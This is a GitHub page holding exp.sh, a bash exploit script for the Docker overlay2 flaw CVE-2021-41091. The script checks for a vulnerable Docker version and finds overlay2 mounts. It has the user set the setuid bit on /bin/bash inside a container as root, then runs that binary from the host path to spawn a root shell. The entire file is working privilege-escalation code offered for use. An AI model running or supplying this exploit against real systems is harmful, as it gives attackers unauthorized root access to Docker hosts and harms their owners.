-
Notifications
You must be signed in to change notification settings - Fork 7
/
exp.sh
executable file
·61 lines (57 loc) · 2.39 KB
/
exp.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#!/bin/bash
docker_version=$(docker --version 2>/dev/null | awk '{print $3}' | sed 's/,//')
if [ -z "$docker_version" ]; then
echo "[x] Docker not found or an error occurred while checking the version."
exit 1
fi
IFS='.' read -ra ver_parts <<< "$docker_version"
IFS='.' read -ra min_parts <<< "20.10.9"
is_vulnerable=true
for i in "${!ver_parts[@]}"; do
if [[ "${ver_parts[i]}" -gt "${min_parts[i]}" ]]; then
is_vulnerable=false
break
elif [[ "${ver_parts[i]}" -lt "${min_parts[i]}" ]]; then
break
fi
done
if $is_vulnerable; then
output=$(findmnt 2>/dev/null)
result=$(echo "$output" | grep "/var/lib/docker/overlay2" | awk '{print $1}' | sed 's/..//')
if [[ "$result" =~ "/var/lib/docker/overlay2" ]]; then
echo "[!] Vulnerable to CVE-2021-41091"
echo "[!] Now connect to your Docker container that is accessible and obtain root access !"
echo "[>] After gaining root access execute this command (chmod u+s /bin/bash)"
echo ""
read -p "Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): " response
if [[ "$response" != "yes" ]]; then
echo "[x] Please set the setuid bit on /bin/bash in the Docker container and try again."
exit 2
fi
echo "[!] Available Overlay2 Filesystems:"
echo -e "$result\n"
echo "[!] Iterating over the available Overlay2 filesystems !"
while read -r path; do
echo "[?] Checking path: $path"
if cd "$path" 2>/dev/null; then
if ./bin/bash -p 2>/dev/null; then
echo "[!] Rooted !"
echo "[>] Current Vulnerable Path: $(pwd)"
echo "[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'"
echo ""
echo "[!] Spawning Shell"
cd "$path"
exec ./bin/bash -p -i
else
echo -e "[x] Could not get root access in '$path'\n"
fi
else
echo -e "[x] Could not access or change directory to '$path'\n"
fi
done <<< "$result"
else
echo "[x] There's no /var/lib/docker/overlay2 files ! Not vulnerable to CVE-2021-41091"
fi
else
echo "[x] Docker version is greater or equal to 20.10.9, not vulnerable to CVE-2021-41091"
fi